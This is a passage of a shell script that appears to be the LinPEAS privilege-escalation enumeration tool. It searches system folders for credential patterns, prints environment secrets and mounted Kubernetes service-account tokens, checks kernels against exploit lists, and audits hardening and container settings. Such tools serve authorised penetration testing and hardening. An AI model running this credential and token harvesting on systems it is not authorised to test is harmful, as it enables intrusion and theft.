   4221         timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null  | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
   4222         # Search in etc
   4223         timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null  | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
   4224         # Search in opt
   4225         timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null  | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
   4226         # Search in possible web folders (usually only 1 will exist)
   4227         timeout 120 find /var/www /usr/local/www /usr/share/nginx /Library/WebServer/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null  | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
   4228         # Search in logs
   4229         timeout 120 find /var/log /var/logs /Library/Logs -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null  | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
   4230         # Search in backups
   4231         timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null  | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
   4232         # Search in others folders (usually only /srv or /Applications will exist)
   4233         timeout 120 find /tmp /srv /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null  | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
   4234     fi
   4235     wait
   4236     printf "\033[2K\r"
   4237 }
   4238 
   4239 
   4240 
   4241 
   4242 # Checks
   4243 
   4244 
   4245 if echo $CHECKS | grep -q system_information; then
   4246 if check_mitre_filter "T1082,T1552.007,T1518.001,T1547.006,T1068,T1548.003,T1574.007,T1120"; then
   4247 print_title "System Information"
   4248 linpeas_start_host_checker_lookup
   4249 if check_mitre_filter "T1082"; then
   4250 print_2title "Operative system" "T1082"
   4251 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#kernel-exploits"
   4252 (cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED},"
   4253 warn_exec lsb_release -a 2>/dev/null
   4254 if [ "$MACPEAS" ]; then
   4255     warn_exec system_profiler SPSoftwareDataType
   4256 fi
   4257 echo ""
   4258 
   4259 fi
   4260 
   4261 if check_mitre_filter "T1548.003,T1068"; then
   4262 print_2title "Sudo version" "T1548.003,T1068"
   4263 if [ "$(command -v sudo 2>/dev/null || echo -n '')" ]; then
   4264 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-version"
   4265 sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED},"
   4266 else echo_not_found "sudo"
   4267 fi
   4268 echo ""
   4269 
   4270 fi
   4271 
   4272 if check_mitre_filter "T1548.003,T1068"; then
   4273 if (busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator) || [ "$DEBUG" ]; then
   4274     print_2title "USBCreator" "T1548.003,T1068"
   4275     print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.html"
   4276     pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+")
   4277     if [ -z "$pc_version" ]; then
   4278         pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2)
   4279     fi
   4280     if [ -n "$pc_version" ]; then
   4281         pc_length=${#pc_version}
   4282         pc_major=$(echo "$pc_version" | cut -d. -f1)
   4283         pc_minor=$(echo "$pc_version" | cut -d. -f2)
   4284         if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor"  -lt 21 ]; then
   4285             echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED},"
   4286         fi
   4287     fi
   4288 fi
   4289 echo ""
   4290 
   4291 fi
   4292 
   4293 if check_mitre_filter "T1574.007"; then
   4294 print_2title "PATH" "T1574.007"
   4295 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-path-abuses"
   4296 if ! [ "$IAMROOT" ]; then
   4297     echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g"
   4298 fi
   4299 if [ "$DEBUG" ]; then
   4300      echo "New path exported: $PATH"
   4301 fi
   4302 echo ""
   4303 
   4304 fi
   4305 
   4306 if check_mitre_filter "T1082"; then
   4307 print_2title "Date & uptime" "T1082"
   4308 warn_exec date 2>/dev/null
   4309 warn_exec uptime 2>/dev/null
   4310 echo ""
   4311 
   4312 fi
   4313 
   4314 if check_mitre_filter "T1082"; then
   4315 if [ "$EXTRA_CHECKS" ] || [ "$DEBUG" ]; then
   4316     print_2title "CPU info" "T1082"
   4317     warn_exec lscpu 2>/dev/null
   4318     echo ""
   4319 fi
   4320 
   4321 fi
   4322 
   4323 if check_mitre_filter "T1082,T1120"; then
   4324 if [ -f "/etc/fstab" ] || [ "$DEBUG" ]; then
   4325     print_2title "Unmounted file-system?" "T1082,T1120"
   4326     print_info "Check if you can mount umounted devices"
   4327     grep -v "^#" /etc/fstab 2>/dev/null | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed -${E} "s,$notmounted,${SED_RED},g" | sed -${E} "s%$mounted%${SED_BLUE}%g" | sed -${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed -${E} "s,$mountpermsG,${SED_GREEN},g"
   4328     echo ""
   4329 fi
   4330 
   4331 fi
   4332 
   4333 if check_mitre_filter "T1082"; then
   4334 if [ -d "/dev" ] || [ "$DEBUG" ] ; then
   4335     print_2title "Any sd*/disk* disk in /dev? (limit 20)" "T1082"
   4336     ls /dev 2>/dev/null | grep -Ei "^sd|^disk" | sed "s,crypt,${SED_RED}," | head -n 20
   4337     echo ""
   4338 fi
   4339 if [ "$(command -v smbutil 2>/dev/null || echo -n '')" ] || [ "$DEBUG" ]; then
   4340     print_2title "Mounted SMB Shares" "T1082"
   4341     warn_exec smbutil statshares -a
   4342     echo ""
   4343 fi
   4344 
   4345 fi
   4346 
   4347 if check_mitre_filter "T1082"; then
   4348 if ([ "$(command -v diskutil 2>/dev/null || echo -n '')" ] || [ "$DEBUG" ]) && [ "$EXTRA_CHECKS" ]; then
   4349     print_2title "Mounted disks information" "T1082"
   4350     warn_exec diskutil list
   4351     echo ""
   4352 fi
   4353 if [ "$EXTRA_CHECKS" ] || [ "$DEBUG" ]; then
   4354     print_2title "System stats" "T1082"
   4355     (df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk"
   4356     warn_exec free 2>/dev/null
   4357     echo ""
   4358     print_2title "Inode usage" "T1082"
   4359     warn_exec df -i 2>/dev/null
   4360     echo ""
   4361 fi
   4362 
   4363 fi
   4364 
   4365 if check_mitre_filter "T1082,T1552.007"; then
   4366 print_2title "Environment" "T1082,T1552.007"
   4367 print_info "Any private information inside environment variables?"
   4368 (env || printenv || set) 2>/dev/null | grep -Eiv "$NoEnvVars" | sed -${E} "s,$EnvVarsRed,${SED_RED},g" || echo_not_found "env || set"
   4369 echo ""
   4370 
   4371 fi
   4372 
   4373 if check_mitre_filter "T1082"; then
   4374 if [ "$(command -v dmesg 2>/dev/null || echo -n '')" ] || [ "$DEBUG" ]; then
   4375     print_2title "Searching Signature verification failed in dmesg" "T1082"
   4376     print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#dmesg-signature-verification-failed"
   4377     (dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg"
   4378     echo ""
   4379 fi
   4380 
   4381 fi
   4382 
   4383 if check_mitre_filter "T1082"; then
   4384 if [ "$MACPEAS" ]; then
   4385     print_2title "Kernel Extensions not belonging to apple" "T1082"
   4386     kextstat 2>/dev/null | grep -Ev " com.apple."
   4387     echo ""
   4388     print_2title "Unsigned Kernel Extensions" "T1082"
   4389     macosNotSigned /Library/Extensions
   4390     macosNotSigned /System/Library/Extensions
   4391     echo ""
   4392 fi
   4393 if [ "$MACPEAS" ] && [ "$(command -v brew 2>/dev/null || echo -n '')" ]; then
   4394     print_2title "Brew Doctor Suggestions" "T1082"
   4395     brew doctor
   4396     echo ""
   4397 fi
   4398 
   4399 fi
   4400 
   4401 if check_mitre_filter "T1518.001"; then
   4402 print_sysctl_eq_zero() {
   4403     local label="$1"
   4404     local sysctl_path="$2"
   4405     local sysctl_var="$3"
   4406     local zero_color="$4"
   4407     local nonzero_color="$5"
   4408     local sysctl_value
   4409     print_list "$label" "$NC"
   4410     sysctl_value=$(cat "$sysctl_path" 2>/dev/null)
   4411     eval "$sysctl_var=\$sysctl_value"
   4412     if [ -z "$sysctl_value" ]; then
   4413         echo_not_found "$sysctl_path"
   4414     else
   4415         if [ "$sysctl_value" -eq 0 ]; then
   4416             echo "0" | sed -${E} "s,0,${zero_color},"
   4417         else
   4418             echo "$sysctl_value" | sed -${E} "s,.*,${nonzero_color},g"
   4419         fi
   4420     fi
   4421 }
   4422 #-- SY) AppArmor
   4423 print_2title "Protections" "T1518.001"
   4424 print_list "AppArmor enabled? .............. "$NC
   4425 if [ "$(command -v aa-status 2>/dev/null || echo -n '')" ]; then
   4426     aa-status 2>&1 | sed "s,disabled,${SED_RED},"
   4427 elif [ "$(command -v apparmor_status 2>/dev/null || echo -n '')" ]; then
   4428     apparmor_status 2>&1 | sed "s,disabled,${SED_RED},"
   4429 elif [ "$(ls -d /etc/apparmor* 2>/dev/null)" ]; then
   4430     ls -d /etc/apparmor*
   4431 else
   4432     echo_not_found "AppArmor"
   4433 fi
   4434 #-- SY) AppArmor2
   4435 print_list "AppArmor profile? .............. "$NC
   4436 (cat /proc/self/attr/current 2>/dev/null || echo "unconfined") | sed "s,unconfined,${SED_RED}," | sed "s,kernel,${SED_GREEN},"
   4437 #-- SY) LinuxONE
   4438 print_list "is linuxONE? ................... "$NC
   4439 ( (uname -a | grep "s390x" >/dev/null 2>&1) && echo "Yes" || echo_not_found "s390x")
   4440 #-- SY) grsecurity
   4441 print_list "grsecurity present? ............ "$NC
   4442 ( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity")
   4443 #-- SY) PaX
   4444 print_list "PaX bins present? .............. "$NC
   4445 (command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX")
   4446 #-- SY) Execshield
   4447 print_list "Execshield enabled? ............ "$NC
   4448 (grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED},"
   4449 #-- SY) SElinux
   4450 print_list "SELinux enabled? ............... "$NC
   4451 (sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED},"
   4452 #-- SY) Seccomp
   4453 print_list "Seccomp enabled? ............... "$NC
   4454 ([ "$(grep Seccomp /proc/self/status 2>/dev/null | grep -v 0)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN},"
   4455 #-- SY) AppArmor
   4456 print_list "User namespace? ................ "$NC
   4457 if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then echo "enabled" | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed "s,disabled,${SED_RED},"; fi
   4458 #-- SY) Unprivileged user namespaces
   4459 print_sysctl_eq_zero "unpriv_userns_clone? ........... " "/proc/sys/kernel/unprivileged_userns_clone" "unpriv_userns_clone" "$SED_GREEN" "$SED_RED"
   4460 #-- SY) Unprivileged eBPF
   4461 print_sysctl_eq_zero "unpriv_bpf_disabled? ........... " "/proc/sys/kernel/unprivileged_bpf_disabled" "unpriv_bpf_disabled" "$SED_RED" "$SED_GREEN"
   4462 #-- SY) cgroup2
   4463 print_list "Cgroup2 enabled? ............... "$NC
   4464 ([ "$(grep cgroup2 /proc/filesystems 2>/dev/null)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN},"
   4465 #-- SY) Kernel hardening sysctls
   4466 print_sysctl_eq_zero "kptr_restrict? ................. " "/proc/sys/kernel/kptr_restrict" "kptr_restrict" "$SED_RED" "$SED_GREEN"
   4467 print_sysctl_eq_zero "dmesg_restrict? ................ " "/proc/sys/kernel/dmesg_restrict" "dmesg_restrict" "$SED_RED" "$SED_GREEN"
   4468 print_sysctl_eq_zero "ptrace_scope? .................. " "/proc/sys/kernel/yama/ptrace_scope" "ptrace_scope" "$SED_RED" "$SED_GREEN"
   4469 print_sysctl_eq_zero "protected_symlinks? ............ " "/proc/sys/fs/protected_symlinks" "protected_symlinks" "$SED_RED" "$SED_GREEN"
   4470 print_sysctl_eq_zero "protected_hardlinks? ........... " "/proc/sys/fs/protected_hardlinks" "protected_hardlinks" "$SED_RED" "$SED_GREEN"
   4471 print_list "perf_event_paranoid? ........... "$NC
   4472 perf_event_paranoid=$(cat /proc/sys/kernel/perf_event_paranoid 2>/dev/null)
   4473 if [ -z "$perf_event_paranoid" ]; then
   4474     echo_not_found "/proc/sys/kernel/perf_event_paranoid"
   4475 else
   4476     if [ "$perf_event_paranoid" -le 1 ]; then echo "$perf_event_paranoid" | sed -${E} "s,.*,${SED_RED},g"; else echo "$perf_event_paranoid" | sed -${E} "s,.*,${SED_GREEN},g"; fi
   4477 fi
   4478 print_sysctl_eq_zero "mmap_min_addr? ................. " "/proc/sys/vm/mmap_min_addr" "mmap_min_addr" "$SED_RED" "$SED_GREEN"
   4479 print_list "lockdown mode? ................. "$NC
   4480 if [ -f "/sys/kernel/security/lockdown" ]; then
   4481     cat /sys/kernel/security/lockdown 2>/dev/null | sed -${E} "s,none,${SED_RED},g; s,integrity|confidentiality,${SED_GREEN},g"
   4482 else
   4483     echo_not_found "/sys/kernel/security/lockdown"
   4484 fi
   4485 #-- SY) Kernel hardening config flags
   4486 print_list "Kernel hardening flags? ........ "$NC
   4487 if [ -f "/boot/config-$(uname -r)" ]; then
   4488     grep -E 'CONFIG_RANDOMIZE_BASE|CONFIG_STACKPROTECTOR|CONFIG_SLAB_FREELIST_|CONFIG_KASAN' /boot/config-$(uname -r) 2>/dev/null
   4489 elif [ -f "/proc/config.gz" ]; then
   4490     zcat /proc/config.gz 2>/dev/null | grep -E 'CONFIG_RANDOMIZE_BASE|CONFIG_STACKPROTECTOR|CONFIG_SLAB_FREELIST_|CONFIG_KASAN'
   4491 else
   4492     echo_not_found "kernel config"
   4493 fi
   4494 #-- SY) Fail2ban (Intrusion Prevention System)
   4495 print_list "Fail2ban present? .............. "$NC
   4496 if command -v fail2ban-client >/dev/null 2>&1 || [ -S "/var/run/fail2ban/fail2ban.sock" ] || pgrep -x fail2ban-server >/dev/null 2>&1; then
   4497     f2b_jails=$(fail2ban-client status 2>/dev/null | grep "Jail list" | sed "s/.*Jail list:[[:space:]]*//")
   4498     if [ "$f2b_jails" ]; then
   4499         echo "Yes - active, jails: $f2b_jails" | sed -${E} "s,.*,${SED_GREEN},"
   4500     else
   4501         echo "Yes - installed (could not query jails, may need root)" | sed -${E} "s,.*,${SED_GREEN},"
   4502     fi
   4503 else
   4504     echo_not_found "fail2ban"
   4505 fi
   4506 #-- SY) CrowdSec (Intrusion Prevention System)
   4507 print_list "CrowdSec present? .............. "$NC
   4508 if command -v cscli >/dev/null 2>&1 || pgrep -x crowdsec >/dev/null 2>&1; then
   4509     echo "Yes" | sed -${E} "s,.*,${SED_GREEN},"
   4510 else
   4511     echo_not_found "crowdsec"
   4512 fi
   4513 #-- SY) Pending reboot (updates installed but not applied yet)
   4514 print_list "Pending reboot? ................ "$NC
   4515 if [ -f "/var/run/reboot-required" ] || [ -f "/run/reboot-required" ]; then
   4516     echo "Yes - updates installed but not applied, the running kernel/libs may be outdated (check kernel exploits)" | sed -${E} "s,.*,${SED_RED},"
   4517     if [ -f "/var/run/reboot-required.pkgs" ]; then
   4518         sed "s,^,    ," "/var/run/reboot-required.pkgs" 2>/dev/null
   4519     fi
   4520 else
   4521     echo_no
   4522 fi
   4523 #-- SY) Gatekeeper
   4524 if [ "$MACPEAS" ]; then
   4525     print_list "Gatekeeper enabled? .......... "$NC
   4526     (spctl --status 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED},"
   4527     print_list "sleepimage encrypted? ........ "$NC
   4528     (sysctl vm.swapusage | grep "encrypted" | sed "s,encrypted,${SED_GREEN},") || echo_no
   4529     print_list "XProtect? .................... "$NC
   4530     (system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5 | grep -Iv "^$") || echo_no
   4531     print_list "SIP enabled? ................. "$NC
   4532     csrutil status | sed "s,enabled,${SED_GREEN}," | sed "s,enabled,${SED_GREEN}," | sed "s,disabled,${SED_RED}," || echo_no
   4533     print_list "Sealed Snapshot? ............. "$NC
   4534     diskutil apfs list | grep "Snapshot Sealed" | awk -F: '{print $2}' | tr -d '[:space:]' | sed "s,Yes,${SED_GREEN}," | sed "s,No,${SED_RED}," || echo_not_found
   4535     print_list "Sealed Snapshot (2nd)? ....... "$NC
   4536     csrutil authenticated-root status | sed "s,enabled,${SED_GREEN}," | sed "s,disabled,${SED_RED}," || echo_no
   4537     print_list "Connected to JAMF? ........... "$NC
   4538     warn_exec jamf checkJSSConnection
   4539     print_list "Connected to AD? ............. "$NC
   4540     dsconfigad -show && echo "" || echo_no
   4541 fi
   4542 #-- SY) ASLR
   4543 print_list "Is ASLR enabled? ............... "$NC
   4544 ASLR=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null)
   4545 if [ -z "$ASLR" ]; then
   4546     echo_not_found "/proc/sys/kernel/randomize_va_space";
   4547 else
   4548     if [ "$ASLR" -eq "0" ]; then printf $RED"No"$NC; else printf $GREEN"Yes"$NC; fi
   4549     echo ""
   4550 fi
   4551 #-- SY) Printer
   4552 print_list "Printer? ....................... "$NC
   4553 (lpstat -a || system_profiler SPPrintersDataType || echo_no) 2>/dev/null
   4554 #-- SY) Running in a virtual environment
   4555 print_list "Is this a virtual machine? ..... "$NC
   4556 hypervisorflag=$(grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor)
   4557 if [ "$(command -v systemd-detect-virt 2>/dev/null || echo -n '')" ]; then
   4558     detectedvirt=$(systemd-detect-virt)
   4559     if [ "$hypervisorflag" ]; then printf $RED"Yes ($detectedvirt)"$NC; else printf $GREEN"No"$NC; fi
   4560 else
   4561     if [ "$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi
   4562 fi
   4563 echo ""
   4564 
   4565 fi
   4566 
   4567 if check_mitre_filter "T1547.006,T1068"; then
   4568 echo ""
   4569 print_2title "Kernel Modules Information" "T1547.006"
   4570 checkCIFSwitchCVE202646243
   4571 # List loaded kernel modules
   4572 if [ "$EXTRA_CHECKS" ] || [ "$DEBUG" ]; then
   4573     print_3title "Loaded kernel modules" "T1547.006"
   4574     if [ -f "/proc/modules" ]; then
   4575         if command -v lsmod >/dev/null 2>&1; then
   4576             lsmod
   4577         else
   4578             cat /proc/modules
   4579         fi
   4580     else
   4581         echo_not_found "/proc/modules"
   4582     fi
   4583 fi
   4584 # Check for kernel modules with weak permissions
   4585 print_3title "Kernel modules with weak perms?" "T1547.006"
   4586 if [ -d "/lib/modules" ]; then
   4587     find /lib/modules -type f -name "*.ko" -ls 2>/dev/null | grep -Ev "root\s+root" | sed -${E} "s,.*,${SED_RED},g"
   4588     if [ $? -eq 1 ]; then
   4589         echo "No kernel modules with weak permissions found"
   4590     fi
   4591 else
   4592     echo_not_found "/lib/modules"
   4593 fi
   4594 echo ""
   4595 # Check for kernel modules that can be loaded by unprivileged users
   4596 print_3title "Kernel modules loadable? " "T1547.006"
   4597 if [ -f "/proc/sys/kernel/modules_disabled" ]; then
   4598     if [ "$(cat /proc/sys/kernel/modules_disabled)" = "0" ]; then
   4599         echo "Modules can be loaded" | sed -${E} "s,.*,${SED_RED},g"
   4600     else
   4601         echo "Modules cannot be loaded" | sed -${E} "s,.*,${SED_GREEN},g"
   4602     fi
   4603 else
   4604     echo_not_found "/proc/sys/kernel/modules_disabled"
   4605 fi
   4606 # Check for module signature enforcement
   4607 print_3title "Module signature enforcement? " "T1547.006"
   4608 if [ -f "/proc/sys/kernel/module_sig_enforce" ]; then
   4609     if [ "$(cat /proc/sys/kernel/module_sig_enforce)" = "1" ]; then
   4610         echo "Enforced" | sed -${E} "s,.*,${SED_GREEN},g"
   4611     else
   4612         echo "Not enforced" | sed -${E} "s,.*,${SED_RED},g"
   4613     fi
   4614 elif [ -f "/sys/module/module/parameters/sig_enforce" ]; then
   4615     if [ "$(cat /sys/module/module/parameters/sig_enforce)" = "Y" ]; then
   4616         echo "Enforced" | sed -${E} "s,.*,${SED_GREEN},g"
   4617     else
   4618         echo "Not enforced" | sed -${E} "s,.*,${SED_RED},g"
   4619     fi
   4620 else
   4621     echo_not_found "module_sig_enforce"
   4622 fi
   4623 echo ""
   4624 
   4625 fi
   4626 
   4627 if check_mitre_filter "T1068"; then
   4628 print_2title "Checking for Copy Fail (CVE-2026-31431)" "T1068"
   4629 print_info "https://copy.fail/"
   4630 print_info "https://www.cve.org/CVERecord?id=CVE-2026-31431"
   4631 checkCopyFail
   4632 echo ""
   4633 
   4634 fi
   4635 
   4636 if check_mitre_filter "T1068"; then
   4637 print_2title "Kernel Exploit Registry" "T1068"
   4638 kercve_run_registry
   4639 echo ""
   4640 
   4641 fi
   4642 
   4643 if check_mitre_filter "T1068"; then
   4644 print_2title "Checking for Dirty Frag (CVE-2026-43284 / CVE-2026-43500)" "T1068"
   4645 print_info "https://ubuntu.com/blog/dirty-frag-linux-vulnerability-fixes-available"
   4646 print_info "https://www.cve.org/CVERecord?id=CVE-2026-43284"
   4647 print_info "https://www.cve.org/CVERecord?id=CVE-2026-43500"
   4648 checkDirtyFrag
   4649 echo ""
   4650 
   4651 fi
   4652 
   4653 if check_mitre_filter "T1082"; then
   4654 if [ "$ONLINE_VULN_CHECKS" ] && [ -z "$NOT_CHECK_EXTERNAL_HOSTNAME" ]; then
   4655   print_2title "Package Vulnerabilities" "T1082"
   4656   print_info "This uses the optional HackTricks online lookup enabled with -V or -a. Output is capped at 50 vulnerable packages."
   4657   linpeas_print_package_vulnerabilities
   4658   echo ""
   4659 fi
   4660 
   4661 fi
   4662 
   4663 fi
   4664 
   4665 fi
   4666 echo ''
   4667 echo ''
   4668 if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
   4669 
   4670 if echo $CHECKS | grep -q container; then
   4671 if check_mitre_filter "T1613,T1528,T1552.007,T1611"; then
   4672 print_title "Container"
   4673 if check_mitre_filter "T1613"; then
   4674 print_2title "Container related tools present (if any):" "T1613"
   4675 # Container runtimes
   4676 command -v docker
   4677 command -v lxc
   4678 command -v rkt
   4679 command -v podman
   4680 command -v runc
   4681 command -v ctr
   4682 command -v containerd
   4683 command -v crio
   4684 command -v nerdctl
   4685 # Container management
   4686 command -v kubectl
   4687 command -v crictl
   4688 command -v docker-compose
   4689 command -v docker-machine
   4690 command -v minikube
   4691 command -v kind
   4692 # Container networking
   4693 command -v docker-proxy
   4694 command -v cni
   4695 command -v flanneld
   4696 command -v calicoctl
   4697 # Container security
   4698 command -v apparmor_parser
   4699 command -v seccomp
   4700 command -v gvisor
   4701 command -v kata-runtime
   4702 # Container debugging
   4703 command -v nsenter
   4704 command -v unshare
   4705 command -v chroot
   4706 command -v capsh
   4707 command -v setcap
   4708 command -v getcap
   4709 echo ""
   4710 
   4711 fi
   4712 
   4713 if check_mitre_filter "T1528,T1552.007"; then
   4714 if [ "$(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p')" ]; then
   4715   print_2title "Listing mounted tokens" "T1528,T1552.007"
   4716   print_info "https://cloud.hacktricks.wiki/en/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html"
   4717   ALREADY_TOKENS="IinItialVaaluE"
   4718   for i in $(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'); do
   4719       TEMP_TOKEN=$(cat $(echo $i | sed 's/.namespace$/\/token/'))
   4720       if ! [ $(echo $TEMP_TOKEN | grep -E $ALREADY_TOKENS) ]; then
   4721           ALREADY_TOKENS="$ALREADY_TOKENS|$TEMP_TOKEN"
   4722           echo "Directory: $i"
   4723           echo "Namespace: $(cat $i)"
   4724           echo ""
   4725           echo $TEMP_TOKEN
   4726           echo "================================================================================"
   4727           echo ""
   4728       fi
   4729   done
   4730 fi
   4731 
   4732 fi
   4733 
   4734 containerCheck
   4735 if check_mitre_filter "T1613,T1611"; then
   4736 print_2title "Container details" "T1613,T1611"
   4737 print_list "Is this a container? ...........$NC $containerType"
   4738 has_runtime_cli() {
   4739     command -v "$1" >/dev/null 2>&1
   4740 }
   4741 print_runtime_info() {
   4742     if has_runtime_cli "$1"; then
   4743         print_list "$2$NC "
   4744         shift 2
   4745         warn_exec "$@"
   4746     fi
   4747 }
   4748 get_runtime_container_count() {
   4749     if has_runtime_cli "$1"; then
   4750         shift
   4751         "$@" 2>/dev/null | wc -l | tr -d ' '
   4752     else
   4753         echo "0"
   4754     fi
   4755 }
   4756 print_running_containers() {
   4757     if [ "$1" -ne "0" ]; then
   4758         echo "$2" | sed -${E} "s,.*,${SED_RED},"
   4759         shift
   4760         shift
   4761         "$@" 2>/dev/null
   4762         echo ""
   4763     fi
   4764 }
   4765 if [ -e "/proc/vz" ] && ! [ -e "/proc/bc" ]; then
   4766     print_list "Container Runtime ..............$NC OpenVZ"
   4767 fi
   4768 if [ -f "/run/systemd/container" ]; then
   4769      print_list "Systemd Container ..............$NC $(cat /run/systemd/container)"
   4770 fi
   4771 if [ -f "/run/.containerenv" ]; then
   4772     print_list "Podman/OCI marker ..............$NC /run/.containerenv"
   4773 fi
   4774 if [ -f "/.dockerenv" ]; then
   4775     print_list "Docker marker ..................$NC /.dockerenv"
   4776 fi
   4777 # Get container runtime info
   4778 print_runtime_info docker "Docker version ..............." docker version
   4779 print_runtime_info docker "Docker info ................." docker info
   4780 print_runtime_info podman "Podman version .............." podman version
   4781 print_runtime_info podman "Podman info ................" podman info
   4782 print_runtime_info lxc "LXC version ................" lxc version
   4783 print_runtime_info lxc "LXC info ..................." lxc info
   4784 print_runtime_info crio "CRI-O version ..............." crio --version
   4785 print_runtime_info runc "runc version ..............." runc --version
   4786 print_runtime_info crun "crun version ..............." crun --version
   4787 print_runtime_info nerdctl "nerdctl version ............" nerdctl version
   4788 print_runtime_info crictl "crictl version ............." crictl version
   4789 print_runtime_info ctr "ctr version ................" ctr version
   4790 print_list "Interesting runtime sockets ... "$NC
   4791 enumerateDockerSockets
   4792 print_list "Any running containers? ........ "$NC
   4793 # Get counts of running containers for each platform
   4794 dockercontainers=0
   4795 podmancontainers=0
   4796 lxccontainers=0
   4797 rktcontainers=0
   4798 nerdctlcontainers=0
   4799 crictlcontainers=0
   4800 ctrcontainers=0
   4801 dockercontainers=$(get_runtime_container_count docker docker ps --format "{{.Names}}")
   4802 podmancontainers=$(get_runtime_container_count podman podman ps --format "{{.Names}}")
   4803 lxccontainers=$(get_runtime_container_count lxc lxc list -c n --format csv)
   4804 rktcontainers=$(get_runtime_container_count rkt sh -c 'rkt list 2>/dev/null | tail -n +2')
   4805 nerdctlcontainers=$(get_runtime_container_count nerdctl nerdctl ps --format "{{.Names}}")
   4806 crictlcontainers=$(get_runtime_container_count crictl crictl ps -q)
   4807 ctrcontainers=$(get_runtime_container_count ctr ctr -n k8s.io containers list -q)
